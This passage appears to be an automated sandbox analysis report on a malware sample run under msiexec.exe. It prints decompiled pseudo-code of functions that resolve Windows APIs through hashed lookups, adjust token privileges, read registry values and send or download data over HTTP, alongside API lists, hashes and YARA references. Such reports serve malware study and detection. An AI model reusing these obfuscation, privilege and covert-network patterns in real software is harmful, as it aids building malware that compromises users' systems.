0x023347d1
0x023347e2
0x023347e7
0x023347f9
0x023347fc
0x023347fe
0x02334800
0x02334806
0x02334808
0x0233480a
0x02334810
0x0233481d
0x02334838
0x02334838
0x02334810
0x02334844
0x02334844
0x023347b8
0x023347be
0x00000000
0x023347c5
0x023347c5
0x00000000
0x023347c5
0x023347be
0x0233473c
0x02334743
0x02334745
0x0233474d
0x02334845
0x02334753
0x0233475d
0x02334760
0x0233476d
0x02334773
0x0233477c
0x0233477c
0x0233474d
0x02334743

APIs

OffsetRect.USER32 ref: 023346FF
LookupPrivilegeValueW.ADVAPI32(00000000,-02351D33,?), ref: 02334791
EndDialog.USER32 ref: 023347D1
SetTextColor.GDI32(-04871D33,-060B1D33), ref: 0233481D

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: e5c51fe8ea3ea91cf65b8a180123fd178a7d70cc25b863b5f641bd024058d561
Instruction ID: 7d85bd76e73878be8c0f916ba31958d5704549deca6d9989e86dcd4a0a6c4cf8
Opcode Fuzzy Hash: e5c51fe8ea3ea91cf65b8a180123fd178a7d70cc25b863b5f641bd024058d561
Instruction Fuzzy Hash: 9C412773B006245BDB18CF58CCE06BF77AEEB89351B468529E9299B741C235AE45C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 023329D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E023329D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -37018059
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -37017187
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -37018010
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x023329d7
0x023329df
0x023329e1
0x023329e5
0x023329f0
0x023329f5
0x02332a01
0x02332a17
0x02332a1f
0x02332a2b
0x02332a2b
0x02332a31
0x02332a34
0x02332a37
0x02332a3d
0x02332a41
0x02332a43
0x02332a43
0x02332a4b
0x02332a51
0x02332a53
0x02332a57
0x02332a59
0x02332a5c
0x02332a62
0x02332a6f
0x02332a81

APIs

DeleteDC.GDI32(-0234DD33), ref: 023329E5
SetWindowPos.USER32(-0234DD33,02337BEC,00000191,02337BEC,02337BEC,02337BEC,00000191), ref: 02332A1F
ResetEvent.KERNEL32(-0234D663,?,02337BEC,-02351FA0,-060B1D33,-02351D33,?,02339287,-02351D33,?,023377A1,00000001,?,-02351D33,?,02336A74), ref: 02332A4B
CreateDIBSection.GDI32(-0234D99A,-0234D99A,-0234D9CB,-0234D663,-0234D9CB,-0234D9CB), ref: 02332A6F

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: 4a62047a91d6f224b22badf722b489031a514b620819a92da97ae22b361bbe4c
Instruction ID: b073a493fae2c5dc6e8ac821329a4fb31fd961eeb53b57aaad77eb11a3d7a254
Opcode Fuzzy Hash: 4a62047a91d6f224b22badf722b489031a514b620819a92da97ae22b361bbe4c
Instruction Fuzzy Hash: 3311C873B402257FD7244A5ADC49DDBBA5EEBC9710F060126FD49DB140DA716F0586E0

Uniqueness

Uniqueness Score: -1.00%

Function 023F7E85, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 023F7EA9

Part of subcall function 023F7CD4: __fltout2.LIBCMT ref: 023F7CFE

__cftog_l.LIBCMT ref: 023F7ECF
__cftoe_l.LIBCMT ref: 023F7F01

Memory Dump Source

Source File: 00000004.00000002.2160916994.0000000002356000.00000020.00020000.sdmp, Offset: 02356000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 667b081f632e61fa1e8d5c6dfd44ef4da7dd9ff53cb857af912f8f8f0705f93f
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 6D014B3240014EBBCFA25E84EC41CEE7F27BB18794F598416FB1858530E736CAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 023F993B, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 023F8537: __getptd_noexit.LIBCMT ref: 023F8538
Part of subcall function 023F8537: __amsg_exit.LIBCMT ref: 023F8545

__amsg_exit.LIBCMT ref: 023F9967
__lock.LIBCMT ref: 023F9977
InterlockedDecrement.KERNEL32(?), ref: 023F9994
InterlockedIncrement.KERNEL32(0240F598), ref: 023F99BF

Memory Dump Source

Source File: 00000004.00000002.2160916994.0000000002356000.00000020.00020000.sdmp, Offset: 02356000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 4e67ee865cc2d7b425bac4e4f415535f773108ec9b8f04354ec9b771c87ff246
Instruction ID: 8735ebe0af79538dffb47bcdc7d28c72cde6e24de02ce2a40a5c01da483e6757
Opcode Fuzzy Hash: 4e67ee865cc2d7b425bac4e4f415535f773108ec9b8f04354ec9b771c87ff246
Instruction Fuzzy Hash: 5601C032D44711ABD7B8AF64B584B4E7371FF05724F020426EE1867A80CB34A996CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 023F8400, Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0240CB9C,0240DD60,0000000C,023F8512,00000000,00000000,?,023F88F8,?,00000001,?,023FB00B,00000018,0240DE68,0000000C,023FB09A), ref: 023F8411
InterlockedIncrement.KERNEL32(0240F170), ref: 023F846C
__lock.LIBCMT ref: 023F8474
___addlocaleref.LIBCMT ref: 023F8493

Memory Dump Source

Source File: 00000004.00000002.2160916994.0000000002356000.00000020.00020000.sdmp, Offset: 02356000, based on PE: false

Similarity

API ID: HandleIncrementInterlockedModule___addlocaleref__lock
String ID:
API String ID: 2801583907-0
Opcode ID: ad567f96b2204966f2884f01bfe819238bf575ed0c7d8e64a1eaf6f006b2ff37
Instruction ID: fbbfc91dd340fc347e1b9030007636eeaeef3da2812b7b4a127762065e27a81f
Opcode Fuzzy Hash: ad567f96b2204966f2884f01bfe819238bf575ed0c7d8e64a1eaf6f006b2ff37
Instruction Fuzzy Hash: 62117070940701DEE7709F75E984F5BBBE0EF04314F10492AD69A97690CB749984CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exe PID: 2416 Parent PID: 2364 msiexec.exeCOMMON

Executed Functions

Function 000A9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000A9C90(void* __eflags, intOrPtr _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v36;
				intOrPtr* _t14;
				intOrPtr* _t15;
				void* _t16;
				void* _t17;
				intOrPtr* _t21;
				void* _t22;
				intOrPtr* _t23;
				void* _t26;
				int _t29;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				intOrPtr* _t34;
				signed char _t36;
				signed int _t37;
				signed int _t38;
				void** _t40;
				void* _t46;
				void* _t48;
				void* _t49;

				_t14 = E0009BF50(__eflags, 9, 0xbe1ef6e);
				_t15 = E0009BF50(__eflags, 0, 0x160d384);
				_t48 = _t46 + 0x10;
				_t16 =  *_t15();
				_t40 =  &_v20;
				_t17 =  *_t14(_t16, 0x20, 0, _t40);
				_t57 = _t17;
				if(_t17 != 0) {
					L2:
					_v36.PrivilegeCount = 1;
					_v24 = (_a8 & 0x000000ff) + (_a8 & 0x000000ff);
					_t21 = E0009BF50(_t58, 9, 0xa2414e7);
					_t49 = _t48 + 8;
					_t22 =  *_t21(0, _a4,  &(_v36.Privileges));
					_t59 = _t22;
					if(_t22 == 0) {
						L5:
						_t38 = 0;
						__eflags = 0;
					} else {
						_t26 = E00099D50(0x647400a5);
						E0009BF50(_t59, _t26, E00099D50(0x68f91a9f));
						_t49 = _t49 + 0x10;
						_t29 = AdjustTokenPrivileges(_v20, 0,  &_v36, 0, 0, 0); // executed
						_t60 = _t29;
						if(_t29 == 0) {
							goto L5;
						} else {
							_t30 = E0009BF50(_t60, 0, 0xc702be2);
							_t49 = _t49 + 8;
							_t31 =  *_t30();
							_t61 = _t31;
							_t38 = _t37 & 0xffffff00 | _t31 == 0x00000000;
						}
					}
					_t23 = E0009BF50(_t61, 0, 0xb8e7db5);
					 *_t23(_v20);
				} else {
					_t32 = E00099D50(0x647400a5);
					_t34 = E0009BF50(_t57, _t32, E00099D50(0x6b5f7e12));
					_t36 = E000955C0( *_t34(0xffffffff, 0x20, _t40), 0);
					_t48 = _t48 + 0x18;
					_t58 = _t36 & 0x00000001;
					if((_t36 & 0x00000001) != 0) {
						_t38 = 0;
						__eflags = 0;
					} else {
						goto L2;
					}
				}
				return _t38;
			}

0x000a9ca0
0x000a9cb1
0x000a9cb6
0x000a9cb9
0x000a9cbb
0x000a9cc4
0x000a9cc6
0x000a9cc8
0x000a9d0a
0x000a9d10
0x000a9d1f
0x000a9d29
0x000a9d2e
0x000a9d35
0x000a9d37
0x000a9d39
0x000a9d8e
0x000a9d8e
0x000a9d8e
0x000a9d3b
0x000a9d40
0x000a9d59
0x000a9d5e
0x000a9d70
0x000a9d72
0x000a9d74
0x00000000
0x000a9d76
0x000a9d7d
0x000a9d82
0x000a9d85
0x000a9d87
0x000a9d89
0x000a9d89
0x000a9d74
0x000a9d97
0x000a9da2
0x000a9cca
0x000a9ccf
0x000a9ce8
0x000a9cfa
0x000a9cff
0x000a9d02
0x000a9d04
0x000a9da6
0x000a9da6
0x00000000
0x00000000
0x00000000
0x000a9d04
0x000a9db1

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000A9D70

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AdjustLibraryLoadPrivilegesToken
String ID:
API String ID: 1509250347-0
Opcode ID: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction ID: 20b3f2395e56da2729c00de75a3431a9f906f75f4e13e41830d747d92255f8d0
Opcode Fuzzy Hash: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction Fuzzy Hash: 0C21D3A2E403153AEF2036F46D13FBE35589B52B25F090034FD18B92C3FA91AA1495B3

Uniqueness

Uniqueness Score: -1.00%

Function 00091AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00091AF0(void* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				long _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t24;
				void* _t27;
				int _t31;
				signed char _t32;
				intOrPtr* _t33;
				intOrPtr _t38;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;
				void* _t58;

				_t24 = _a12;
				_t50 = _a16;
				_v24 = 0;
				_t48 =  <=  ? _t24 : 0xa00000;
				_t54 = 0;
				_v32 =  <=  ? _t24 : 0xa00000;
				_t63 = _t50;
				if(_t50 == 0) {
					while(1) {
						L2:
						_t6 = _t54 + 0x40000; // 0x40000
						_v20 = 0x40000;
						_t27 = E000AB220(_t64,  &_v24, _t6); // executed
						_t56 = _t55 + 8;
						_t65 = _t27;
						if(_t27 == 0) {
							break;
						}
						E0009BF50(_t65, 0x13, 0x7e90205);
						_t56 = _t56 + 8;
						_t42 = _v24;
						_t31 = InternetReadFile(_a4, _t42 + _t54, _v20,  &_v20); // executed
						if(_t31 == 0) {
							break;
						}
						_v28 = _t42;
						_t43 = _t50;
						_t51 = _v20;
						_t32 = E000955C0(_v20, 0);
						_t58 = _t56 + 8;
						_t67 = _t32 & 0x00000001;
						if((_t32 & 0x00000001) != 0) {
							_t33 = _a8;
							__eflags = _t33;
							if(_t33 == 0) {
								E0009B570(_v28);
								return 1;
							}
							 *_t33 = _v28;
							 *((intOrPtr*)(_t33 + 4)) = _t54;
							return 1;
						}
						_t38 = E000922E0(_t67, _t51 + _t54 + E00099D50(0x6fb39a5e), 0xbc79af2);
						_t56 = _t58 + 0xc;
						if(_t38 > _v32) {
							break;
						}
						_t54 = _t38;
						_t50 = _t43;
						_t64 = _t50;
						if(_t50 != 0) {
							goto L1;
						}
					}
					L8:
					E0009B570(_v24);
					__eflags = 0;
					return 0;
				}
				L1:
				_t40 = E0009BF50(_t63, 0, E00099D50(0x640dea48));
				_t56 = _t56 + 0xc;
				_t41 =  *_t40(_t50, 0);
				_t64 = _t41 - 0x102;
				if(_t41 != 0x102) {
					goto L8;
				}
				goto L2;
			}

0x00091af9
0x00091afc
0x00091b04
0x00091b14
0x00091b17
0x00091b19
0x00091b1c
0x00091b1e
0x00091b48
0x00091b48
0x00091b48
0x00091b4e
0x00091b5a
0x00091b5f
0x00091b62
0x00091b64
0x00000000
0x00000000
0x00091b6d
0x00091b72
0x00091b75
0x00091b86
0x00091b8a
0x00000000
0x00000000
0x00091b8c
0x00091b8f
0x00091b91
0x00091b97
0x00091b9c
0x00091b9f
0x00091ba1
0x00091bed
0x00091bf0
0x00091bf2
0x00091c03
0x00000000
0x00091c0b
0x00091bf7
0x00091bf9
0x00000000
0x00091bfc
0x00091bba
0x00091bbf
0x00091bc5
0x00000000
0x00000000
0x00091bc7
0x00091bc9
0x00091bcb
0x00091bcd
0x00000000
0x00000000
0x00091bd3
0x00091bd8
0x00091bdb
0x00091be3
0x00000000
0x00091be3
0x00091b20
0x00091b30
0x00091b35
0x00091b3b
0x00091b3d
0x00091b42
0x00000000
0x00000000
0x00000000

APIs

InternetReadFile.WININET(?,?,00040000,00040000), ref: 00091B86

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction ID: 06d5e3289d26b77ad21ae167c27f9fb4c6f363e623e0b8f0153b37d360c3f5fe
Opcode Fuzzy Hash: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction Fuzzy Hash: 2731D8B6E0020B6BDF10DE94EC42FFF77A6AF51715F150025F804A7242F771A915A7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0009BA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0009BA60(void* __eax, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
				int _v20;
				signed char _t22;
				long _t24;
				void* _t26;
				long _t29;
				signed char _t30;
				char* _t34;
				long _t36;
				char** _t47;
				int _t49;
				char* _t51;
				void* _t52;
				void* _t54;
				void* _t58;
				void* _t60;

				_push(__eax);
				 *_a20 = 0;
				_t22 = E000A5000(_a20, _t60, 0xffffffff);
				E0009BF50(_t60, 9, 0xda29a27);
				_t54 = _t52 + 0xc;
				_t24 = RegOpenKeyExW(_a4, _a8, 0, (_t22 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t49 = 0xffffffff;
				_t61 = _t24;
				if(_t24 == 0) {
					_t47 = _a20;
					_v20 = 0;
					_t26 = E00099D50(0x647400a5);
					E0009BF50(_t61, _t26, E00099D50(0x64f4976b));
					_t58 = _t54 + 0x10;
					_t29 = RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v20); // executed
					_t62 = _t29;
					if(_t29 == 0) {
						_t39 = _v20;
						_t30 = E000955C0(_v20, 0);
						_t58 = _t58 + 8;
						_t49 = 0;
						__eflags = _t30 & 0x00000001;
						if(__eflags == 0) {
							E00091460(__eflags, _t39, 4);
							_t34 = E00098290(_t39 + 4);
							_t58 = _t58 + 0xc;
							__eflags = _t34;
							if(__eflags == 0) {
								goto L2;
							} else {
								_t51 = _t34;
								E0009BF50(__eflags, 9, 0x8097c7);
								_t58 = _t58 + 8;
								_t36 = RegQueryValueExW(_a4, _a12, 0, _a16, _t51,  &_v20); // executed
								__eflags = _t36;
								if(__eflags == 0) {
									 *_t47 = _t51;
									_t49 = _v20;
								} else {
									E0009B570(_t51);
									_t58 = _t58 + 4;
									goto L2;
								}
							}
						}
					} else {
						L2:
						_t49 = 0xffffffff;
					}
					E0009BF50(_t62, 9, 0x3111c69);
					_t54 = _t58 + 8;
					RegCloseKey(_a4); // executed
				}
				return _t49;
			}

0x0009ba66
0x0009ba70
0x0009ba78
0x0009ba90
0x0009ba95
0x0009baa1
0x0009baa3
0x0009baa8
0x0009baaa
0x0009bab0
0x0009bab3
0x0009babf
0x0009bad8
0x0009badd
0x0009baf1
0x0009baf3
0x0009baf5
0x0009bafe
0x0009bb04
0x0009bb09
0x0009bb0c
0x0009bb0e
0x0009bb10
0x0009bb18
0x0009bb21
0x0009bb26
0x0009bb29
0x0009bb2b
0x00000000
0x0009bb2d
0x0009bb2d
0x0009bb36
0x0009bb3b
0x0009bb4e
0x0009bb50
0x0009bb52
0x0009bb5f
0x0009bb61
0x0009bb54
0x0009bb55
0x0009bb5a
0x00000000
0x0009bb5a
0x0009bb52
0x0009bb2b
0x0009baf7
0x0009baf7
0x0009baf7
0x0009baf7
0x0009bb6b
0x0009bb70
0x0009bb76
0x0009bb76
0x0009bb81

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 0009BAA1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0009BAF1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0009BB4E
RegCloseKey.KERNEL32(?), ref: 0009BB76

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction ID: 9a0d17dbb8a912238e8bee2854659a4a7f8f4338881ce0d476bedb172a3c650d
Opcode Fuzzy Hash: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction Fuzzy Hash: EE31B3B29002157BEF109E64AD42FFE3658AB15774F090124FD18A62D3F7B1AA1097F2

Uniqueness

Uniqueness Score: -1.00%

Function 000ABAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E000ABAD0(void* __eflags, void* _a4, char* _a8, char* _a12, void* _a16, long _a20, intOrPtr _a24) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				long _v32;
				char* _v36;
				char _v48;
				char _v54;
				char _v65;
				char _v97;
				char _v204;
				intOrPtr _t38;
				void* _t43;
				char* _t47;
				char* _t51;
				void* _t52;
				char* _t57;
				int _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				signed char _t65;
				intOrPtr* _t68;
				void* _t72;
				intOrPtr* _t74;
				signed char _t82;
				signed int _t85;
				void* _t99;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t115;
				void* _t117;
				intOrPtr _t126;

				_t125 = __eflags;
				_t38 = E00093750(_t125, E000920A0(__eflags, _a24, 0xfffffffb), _a24);
				_t126 = _t38;
				_v28 = _t38;
				E000AED80( &_v48, _t126, E0009D0A0( &_v54, "HHb?",  &_v54));
				_v36 = E000AFCF0( &_v48);
				_v32 = 0;
				_t43 = E00099D50(0x647400bf);
				E0009BF50(_t126, _t43, E00099D50(0x6f9f943d));
				_t47 = E0009D0A0( &_v65, 0xb04e6,  &_v65);
				_t90 =  ==  ? 0xb0779 : 0xb07f4;
				_t51 = E0009D0A0( &_v204,  ==  ? 0xb0779 : 0xb07f4,  &_v204);
				_t115 = _t107 + 0x38;
				_t52 = HttpOpenRequestA(_a4, _t51, _a8, _t47, _a12,  &_v36, (0 | _t126 != 0x00000000) << 0x00000017 | 0x8404c700, 0); // executed
				_t104 = 0;
				if(_t52 == 0) {
					L9:
					E000AEC50( &_v48, _t134);
					return _t104;
				}
				_t105 = _a16;
				_t129 = _v28;
				_t99 = _t52;
				if(_v28 != 0) {
					_v20 = 0;
					_v24 = 4;
					_t68 = E0009BF50(_t129, 0x13, 0x85dc001);
					_t115 = _t115 + 8;
					_push( &_v24);
					_push( &_v20);
					_push(0x1f);
					_push(_t99);
					if( *_t68() != 0) {
						_t85 = _v20 ^ 0x00013380 | E00099D50(0x6475332c) & _v20;
						_t131 = _t85;
						_v20 = _t85;
						_t72 = E00099D50(0x647400bf);
						_t74 = E0009BF50(_t85, _t72, E00099D50(0x61c0d6ad));
						_t115 = _t115 + 0x14;
						 *_t74(_t99, 0x1f,  &_v20, 4);
					}
				}
				E0009BF50(_t131, 0x13, 0xb157a91);
				_t57 = E0009D0A0( &_v97, 0xb0880,  &_v97);
				_t117 = _t115 + 0x10;
				_t58 = HttpSendRequestA(_t99, _t57, 0x13, _t105, _a20); // executed
				_t132 = _t58;
				if(_t58 == 0) {
					L8:
					_t59 = E0009BF50(__eflags, 0x13, 0x714b685);
					 *_t59(_t99);
					_t104 = 0;
					__eflags = 0;
				} else {
					_v20 = 0;
					_v24 = 4;
					_t61 = E0009BF50(_t132, 0x13, 0x249c261);
					_t82 = E000955C0( *_t61(_t99, 0x20000013,  &_v20,  &_v24, 0), 0) & 0x00000001;
					_t65 = E00095920( &_v24, _v20, E00099D50(0x64740064));
					_t117 = _t117 + 0x1c;
					if((_t82 & _t65) != 0) {
						goto L8;
					}
					_t134 = _t65 & 0x00000001 ^ _t82;
					if((_t65 & 0x00000001 ^ _t82) != 0) {
						goto L8;
					}
					_t104 = _t99;
				}
			}

0x000abad0
0x000abaec
0x000abaf6
0x000abaf8
0x000abb1e
0x000abb2a
0x000abb2d
0x000abb39
0x000abb52
0x000abb65
0x000abb7e
0x000abb89
0x000abb8e
0x000abba3
0x000abba5
0x000abba9
0x000abce1
0x000abce4
0x000abcf5
0x000abcf5
0x000abbaf
0x000abbb2
0x000abbb6
0x000abbb8
0x000abbba
0x000abbc1
0x000abbcf
0x000abbd4
0x000abbdd
0x000abbde
0x000abbdf
0x000abbe1
0x000abbe6
0x000abc00
0x000abc00
0x000abc02
0x000abc0a
0x000abc23
0x000abc28
0x000abc34
0x000abc34
0x000abbe6
0x000abc3d
0x000abc50
0x000abc55
0x000abc60
0x000abc62
0x000abc64
0x000abccd
0x000abcd4
0x000abcdd
0x000abcdf
0x000abcdf
0x000abc66
0x000abc66
0x000abc6d
0x000abc7b
0x000abca5
0x000abcb7
0x000abcbc
0x000abcc1
0x00000000
0x00000000
0x000abcc5
0x000abcc7
0x00000000
0x00000000
0x000abcc9
0x000abcc9

APIs

HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000ABBA3
HttpSendRequestA.WININET(00000000,00000000,00000013,?,00000000), ref: 000ABC60

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Strings

HHb?, xrefs: 000ABB0B

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: HttpRequest$LibraryLoadOpenSend
String ID: HHb?
API String ID: 1801990682-3770701742
Opcode ID: 146d2e90b6f3af0f737ec5d07bdaf6c45bc14433371efdeeb20c7dcf84d38998
Instruction ID: b90c88e23c4269f42729eee88e10057647c254401fe32fbebffa8165428e63bf
Opcode Fuzzy Hash: 146d2e90b6f3af0f737ec5d07bdaf6c45bc14433371efdeeb20c7dcf84d38998
Instruction Fuzzy Hash: 3651C9B2D402197BEF10AAE0EC52FFF76689B51714F050034FE18A6243FB655A1597F2

Uniqueness

Uniqueness Score: -1.00%

Function 000A1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E000A1E90(void* __eflags, intOrPtr _a4) {
				short _v440;
				char _v516;
				char _v536;
				char _v1056;
				intOrPtr* _t10;
				void* _t11;
				signed char _t12;
				intOrPtr* _t16;
				intOrPtr* _t18;
				void* _t19;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t29;
				char* _t32;
				char* _t33;
				void* _t36;
				void* _t38;

				_t10 = E0009BF50(__eflags, 8, 0x3a5687);
				_t32 =  &_v1056;
				_t11 =  *_t10(0, 0x24, 0, 0, _t32); // executed
				_t12 = E000955C0(_t11, 0);
				_t38 = _t36 + 0x10;
				_t48 = _t12 & 0x00000001;
				if((_t12 & 0x00000001) == 0) {
					L7:
					E000A8F20(_a4, E00099D50(0x647400bc));
					__eflags = 0;
					return 0;
				}
				_t16 = E0009BF50(_t48, 3, 0x55e8477);
				 *_t16(_t32);
				_t18 = E0009BF50(_t48, 0, 0xfb8d9e7);
				_t38 = _t38 + 0x10;
				_t33 =  &_v536;
				0;
				while(1) {
					_t19 =  *_t18(_t32, _t33, 0x104); // executed
					_t49 = _t19;
					if(_t19 != 0) {
						break;
					}
					_t23 = E0009BF50(_t49, 3, 0xd0682f7);
					 *_t23(_t32);
					_t25 = E0009BF50(_t49, 3, 0x42c2f97);
					_t38 = _t38 + 0x10;
					_t26 =  *_t25(_t32);
					_t50 = _t26;
					if(_t26 == 0) {
						goto L7;
					}
					_t27 = E00099D50(0x647400af);
					_t29 = E0009BF50(_t50, _t27, E00099D50(0x612a84db));
					 *_t29(_t32);
					_t18 = E0009BF50(_t50, 0, E00099D50(0x6bccd94b));
					_t38 = _t38 + 0x1c;
				}
				__eflags = _v516 - 0x7b;
				if(__eflags != 0) {
					goto L7;
				}
				_v440 = 0;
				_t20 = E0009BF50(__eflags, 0xc, 0xd513d37);
				_t38 = _t38 + 8;
				_t21 =  *_t20( &_v516, _a4);
				__eflags = _t21;
				if(_t21 == 0) {
					return 1;
				}
				goto L7;
			}

0x000a1ea3
0x000a1eab
0x000a1eba
0x000a1ebf
0x000a1ec4
0x000a1ec7
0x000a1ec9
0x000a1faa
0x000a1fbb
0x000a1fc3
0x00000000
0x000a1fc3
0x000a1ed6
0x000a1edf
0x000a1ee8
0x000a1eed
0x000a1ef0
0x000a1efc
0x000a1f00
0x000a1f07
0x000a1f09
0x000a1f0b
0x00000000
0x00000000
0x000a1f14
0x000a1f1d
0x000a1f26
0x000a1f2b
0x000a1f2f
0x000a1f31
0x000a1f33
0x00000000
0x00000000
0x000a1f3a
0x000a1f53
0x000a1f5c
0x000a1f6e
0x000a1f73
0x000a1f73
0x000a1f78
0x000a1f80
0x00000000
0x00000000
0x000a1f88
0x000a1f98
0x000a1f9d
0x000a1fa4
0x000a1fa6
0x000a1fa8
0x00000000
0x000a1fd0
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 000A1EBA

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000104), ref: 000A1F07

Strings

{, xrefs: 000A1F78

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

